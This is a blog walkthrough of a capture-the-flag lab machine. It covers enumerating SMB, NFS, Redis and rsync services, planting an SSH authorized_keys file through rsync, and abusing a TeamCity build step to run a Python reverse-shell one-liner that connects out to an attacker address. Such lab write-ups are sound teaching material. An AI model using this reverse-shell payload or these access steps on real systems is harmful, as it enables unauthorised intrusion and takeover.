Muzec's Cyber Security Blog

Hack. Sleep. Repeat

View on GitHub

image

VulnNet Entertainment is a company that learns from its mistakes. They quickly realized that they can’t make a properly secured web application so they gave up on that idea. Instead, they decided to set up internal services for business purposes. As usual, you’re tasked to perform a penetration test of their network and report your findings.

Difficulty: Easy/Medium
Operating System: Linux

This machine was designed to be quite the opposite of the previous machines in this series and it focuses on internal services. It’s supposed to show you how you can retrieve interesting information and use it to gain system access. Report your findings by submitting the correct flags.

We always start with an nmap scan…..

Nmap -sC -sV -oA nmap <Target-IP>

# Nmap 7.91 scan initiated Mon May 10 03:22:51 2021 as: nmap -sC -sV -oA nmap 10.10.174.95
Nmap scan report for 10.10.174.95
Host is up (0.59s latency).
Not shown: 992 closed ports
PORT     STATE    SERVICE     VERSION
22/tcp   open     ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
|   256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
|_  256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
111/tcp  open     rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      33966/udp6  mountd
|   100005  1,2,3      48735/tcp6  mountd
|   100005  1,2,3      57104/udp   mountd
|   100005  1,2,3      60145/tcp   mountd
|   100021  1,3,4      34733/tcp   nlockmgr
|   100021  1,3,4      37755/tcp6  nlockmgr
|   100021  1,3,4      41102/udp6  nlockmgr
|   100021  1,3,4      46449/udp   nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open     netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp  open     rsync       (protocol version 31)
2049/tcp open     nfs_acl     3 (RPC #100227)
8021/tcp filtered ftp-proxy
9090/tcp filtered zeus-admin
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h20m08s, deviation: 1h09m15s, median: 3h00m07s
|_nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: vulnnet-internal
|   NetBIOS computer name: VULNNET-INTERNAL\x00
|   Domain name: \x00
|   FQDN: vulnnet-internal
|_  System time: 2021-05-10T12:39:18+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-10T10:39:17
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon May 10 03:39:32 2021 -- 1 IP address (1 host up) scanned in 1000.27 seconds

So we have ports open probably like 6 if am right ok let begin since we have smb open also let try it first checking for smb shares we have anonymous access to them.

smbclient -L //10.10.174.95/ -N

image

We have one share we can easily access it with the commands below;

smbclient //10.10.174.95/shares -N

image

And we are in.

image

Checking the temp folder we found the first flag services.txt and moving to the data folder some txt file but not that useful to me just some random messages.

image

Now going back to the scanning checking through the port i can see we have port 2049 NFS open, NFS port 2049 It is a client/server system that allows users to access files across a network and treat them as if they resided in a local file directory.

image

How to Mount it:

  1. showmount -e 10.10.174.95
  2. mkdir /tmp/NFS
  3. mount -t nfs 10.10.174.95:/opt/conf /tmp/NFS
  4. df -k

Now we can easily access the mount folder now.

image

Now since we have redis port open am checking the folder maybe we can get a credentials for it to log into redis, so we have some conf file of redis let check it.

image

And we have a password time to enumerate redis port 6379 .

image

Typing info give use the active databases on redis time to dump it.

image

image

redis-dump -u 10.10.174.95 -a Password > db_full.json

So we have the internal flag with some base64 strings let decode it.

image

And we have the decoded strings with some new password.

image

rsync Ok let explain what is rsync? rsync is a utility for efficiently transferring and synchronizing files between a computer and an external hard drive and across networked computers by comparing the modification times and sizes of files. It is commonly found on Unix-like operating systems. Rsync is written in C as a single threaded application. thanks Wikipedia .

Rsync Useage .

rsync runs on port 873

image

rsync -a rsync://rsync-connect@10.10.174.95/

Boom we can see a files in the home directory now let try to get it onto our system.

rsync -a rsync://rsync-connect@10.10.174.95/files ./rsync

image

So we have to give it time for it to transfer.

image

And it ready let change directory.

image

And we have user.txt also a cool ssh folder hahahahahaha but checking the ssh folder it was empty so sad .

image

Going around so since we can use use rsync to transfer files out i guess we can also use it to transfer file in probably ssh authorized_keys . So i generate a SSH keys with ` ssh-keygen -t rsa`

image

So i rename the id_rsa.pub to authorized_keys now time to get it onto the target.

rsync -av authorized_keys rsync://rsync-connect@10.10.174.95:/files/sys-internal/.ssh

image

Boom and we have it transfer, time to SSH into the machine with the private key we have.

  1. we have to give the private key a permission chmod 600 id_rsa
  2. we have the username which is sys-internal
  3. Let hit SSH

ssh -i id_rsa sys-internal@10.10.174.95

image

And we are in awesome but the journey is not yet completed.

Privilege Escalation

I always check what ports is running if i get access to a machine but netstat was missing on the target so i try using ss -tulpn | grep LISTEN .

image

Hmmm port 8111 look interesting now let set up SSH Tunneling (Port Forwarding) .

image

ssh -i id_rsa -L 8111:localhost:8111 sys-internal@10.10.174.95

Now let visit localhost:8111 to confirm it.

image

Now we need a token to get access to the super user panel so let go back to the machine to enumerate the TeamCity folder spend some time on it and boom i found the token file.

image

So i found the token at /TeamCity/logs/catalina.out let use it to log in without username .

image

And we are in time to get a reverse shell. Now let click on create New project.

image

And fill in the form with anything and click on create.

image

Now let click on the homepage and click the project we just created.

image

Click on it to create new build configuration.

image

Click and create and we should get a new page like that below;

image

Let go back to the homepage again to click on the project again.

image

Now let click on Edit Configuration Settings .

image

Now click on Build steps .

image

Now add build step .

image

Let go through it and pick python.

image

On command we pick custom script now time to add the python reverse shell script to the box with the name scripts.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Now add our Local-IP address and port also start an ncat listener to get our shell.

image

Now let click on save.

image

Now Click On Run we should have our shell.

image

And boom we have shell back.

image

Box Rooted .

Greeting From Muzec



Back To Home